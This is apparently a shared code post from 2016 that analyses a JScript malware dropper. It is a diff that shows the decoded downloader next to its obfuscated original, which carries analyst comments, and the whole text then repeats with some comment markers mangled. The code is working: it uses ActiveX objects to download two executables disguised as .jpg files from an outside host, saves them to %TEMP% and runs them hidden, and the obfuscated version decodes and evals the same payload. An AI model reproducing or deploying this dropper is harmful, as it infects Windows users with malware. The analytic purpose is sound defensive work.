yackermann · March 26, 2016 00:21
diff --git a/execpart.js b/execpart.js
 function dl(fr, fn, rn) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn, 2);
            xa.close();
        };
    };
    try {
        xo.open("GET", fr, false);
        xo.send();
        if (rn > 0) {
            ws.Run(fn, 0, 0);
        };
    } catch (er) {};
 }
 dl("http://31072015a.com/images/five1.jpg", "532747350.exe", 1);
 dl("http://31072015a.com/images/five2.jpg", "211954869.exe", 1);
diff --git a/jsm.js b/jsm.js
 var qugx = 'fkumnjcethivosns gdfll(vfvrs,e wfrnr,k wrrnc)x{y s gvaagrh bwasr n=j vnvefwn nAlcttzigvpesXlOmbkjcexcgtt(z"dWrSscjrsizpqtt.aShhhejldlc"o)r;q a lvqahra ifsnm s=u jwzso.jEcxgpcamnydbEcnsvbikrzolnomceanftsSatqrjiinqgrsa(d"k%vTnEjMkPx%m"q)z ';
 var zdubkd = 'y+o bSbthrcilnggo.zfirooembCphvakrxCmocdyep(n9t2d)x e+b jfuna;h j bvjaqre uxwos u=f hnzegww uArcttgitvsewXhOlbajeeqcbtn(k"cMvStXeMeLk2i.zXgMbLuHmTiTtPs"e)o;k y vxeoq.solncrsepasduydsctwaytweacdhgajndgnek x=z sfqusnwcftcivoang l(s)s{o l h';
 var hgffin = ' h gikfk c(jxgod.nrnemaqdbywSntaaoteet l=j=v=h k4c)s{c u h o c o uvnayrx xxfaa k=s mnbetwj oAucyttinvjecXjOqbmjmejcpth(r"eAjDfOzDxBe.wSutjrxefacmk"g)w;t v q r o e bxran.sodpaebnt(h)t;x r y w o c txjam.qtpyopaev k=t r1b;l f g m w u exaau.';
 var vgg = 'gwtrbiztret(yxooi.bRhersnpxogncsyecBnordtyp)d;z v p v p u wxjab.pploashiftyivonna c=e n0a;l q y o d q hxsat.hsnajvdecTdozFmieloey(ffvnd,e r2q)e;t v s t h i sxval.icdleobsker(l)n;u p n h u}c f z y j;e p z}i i v;b c ctjruyx v{d b z f lxroq';
 var mwpkdt = '.zompfemnt(z"pGzEzTn"i,d cfhrm,k dfoanlfsxei)d;t l e t qxqok.gsqewnmdd(q)m;s p l f xipfh f(crsni q>g n0o)o{r h z v b p lwlsw.cRiuinf(yfunx,n g0d,k w0k)p;z d y p j}m e x d m;w y n}m k zciamthcrhs f(meqrs)s{t d p}d t o;h}rdelq(d"ihotgtvpl:';
 var cbgezx = 'f/j/x3q1i0g7d2p0x1v5uaj.lcnobme/qirmiajgfepsa/jfgievseu1k.ojfpqgx"d,g f"j5j3v2g7f4q7p3q5d0r.veuxjee"d,o u1e)y;adilq(v"thftatkpc:d/q/i3m1a0e7t2f0u1j5way.bcsosmk/wiwmyaqgbewsr/kfnimveet2n.ojvpqgf"e,d g"i2x1m1d9g5j4b8h6b9u.seyxreq"p,t n1h)e';
 var mre = ';b';
 var a1 = qugx + zdubkd + hgffin + vgg + mwpkdt + cbgezx + mre; //Concatination


 var a2 = ""; //Deobfascated storafe

 var a3 = 2; //Step
 var a4 = 10; //Key

 y.var y = new ActiveXObject("Scripting.Dictionary"); //Object
 add("a", "t");//

 if (y.Item("a") == "t") { //??? Return true
    a4 = 0;
 } else {
    a4 = 10
 };

 /*-----DEOBFUSCATION-----*/
 var a5 = a1.length;
 var a = 0;
 while (a < a5) {
    a2 += a1.charAt(a);
    a += a3 + a4; //2
 };

 /*-----EVAL-----*/
 var rosa = ["e", "0", "v", "0", "a", "0", "l", "0"];
 var tosta = rosa[0] + rosa[2] + rosa[4] + rosa[6];
 var a6 = tosta; //eval
 this[a6](a2); //30fuKB9Dok
	function dl(fr, fn, rn) {
	var ws = new ActiveXObject("WScript.Shell");
	var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
	var xo = new ActiveXObject("MSXML2.XMLHTTP");
	xo.onreadystatechange = function() {
	if (xo.readyState === 4) {
	var xa = new ActiveXObject("ADODB.Stream");
	xa.open();
	xa.type = 1;
	xa.write(xo.ResponseBody);
	xa.position = 0;
	xa.saveToFile(fn, 2);
	xa.close();
	};
	};
	try {
	xo.open("GET", fr, false);
	xo.send();
	if (rn > 0) {
	ws.Run(fn, 0, 0);
	};
	} catch (er) {};
	}
	dl("http://31072015a.com/images/five1.jpg", "532747350.exe", 1);
	dl("http://31072015a.com/images/five2.jpg", "211954869.exe", 1);
	var qugx = 'fkumnjcethivosns gdfll(vfvrs,e wfrnr,k wrrnc)x{y s gvaagrh bwasr n=j vnvefwn nAlcttzigvpesXlOmbkjcexcgtt(z"dWrSscjrsizpqtt.aShhhejldlc"o)r;q a lvqahra ifsnm s=u jwzso.jEcxgpcamnydbEcnsvbikrzolnomceanftsSatqrjiinqgrsa(d"k%vTnEjMkPx%m"q)z ';
	var zdubkd = 'y+o bSbthrcilnggo.zfirooembCphvakrxCmocdyep(n9t2d)x e+b jfuna;h j bvjaqre uxwos u=f hnzegww uArcttgitvsewXhOlbajeeqcbtn(k"cMvStXeMeLk2i.zXgMbLuHmTiTtPs"e)o;k y vxeoq.solncrsepasduydsctwaytweacdhgajndgnek x=z sfqusnwcftcivoang l(s)s{o l h';
	var hgffin = ' h gikfk c(jxgod.nrnemaqdbywSntaaoteet l=j=v=h k4c)s{c u h o c o uvnayrx xxfaa k=s mnbetwj oAucyttinvjecXjOqbmjmejcpth(r"eAjDfOzDxBe.wSutjrxefacmk"g)w;t v q r o e bxran.sodpaebnt(h)t;x r y w o c txjam.qtpyopaev k=t r1b;l f g m w u exaau.';
	var vgg = 'gwtrbiztret(yxooi.bRhersnpxogncsyecBnordtyp)d;z v p v p u wxjab.pploashiftyivonna c=e n0a;l q y o d q hxsat.hsnajvdecTdozFmieloey(ffvnd,e r2q)e;t v s t h i sxval.icdleobsker(l)n;u p n h u}c f z y j;e p z}i i v;b c ctjruyx v{d b z f lxroq';
	var mwpkdt = '.zompfemnt(z"pGzEzTn"i,d cfhrm,k dfoanlfsxei)d;t l e t qxqok.gsqewnmdd(q)m;s p l f xipfh f(crsni q>g n0o)o{r h z v b p lwlsw.cRiuinf(yfunx,n g0d,k w0k)p;z d y p j}m e x d m;w y n}m k zciamthcrhs f(meqrs)s{t d p}d t o;h}rdelq(d"ihotgtvpl:';
	var cbgezx = 'f/j/x3q1i0g7d2p0x1v5uaj.lcnobme/qirmiajgfepsa/jfgievseu1k.ojfpqgx"d,g f"j5j3v2g7f4q7p3q5d0r.veuxjee"d,o u1e)y;adilq(v"thftatkpc:d/q/i3m1a0e7t2f0u1j5way.bcsosmk/wiwmyaqgbewsr/kfnimveet2n.ojvpqgf"e,d g"i2x1m1d9g5j4b8h6b9u.seyxreq"p,t n1h)e';
	var mre = ';b';
	var a1 = qugx + zdubkd + hgffin + vgg + mwpkdt + cbgezx + mre; //Concatination


	var a2 = ""; //Deobfascated storafe

	var a3 = 2; //Step
	var a4 = 10; //Key

	y.var y = new ActiveXObject("Scripting.Dictionary"); //Object
	add("a", "t");//

	if (y.Item("a") == "t") { //??? Return true
	a4 = 0;
	} else {
	a4 = 10
	};

	/-----DEOBFUSCATION-----/
	var a5 = a1.length;
	var a = 0;
	while (a < a5) {
	a2 += a1.charAt(a);
	a += a3 + a4; //2
	};

	/-----EVAL-----/
	var rosa = ["e", "0", "v", "0", "a", "0", "l", "0"];
	var tosta = rosa[0] + rosa[2] + rosa[4] + rosa[6];
	var a6 = tosta; //eval
	this[a6](a2); //30fuKB9Dok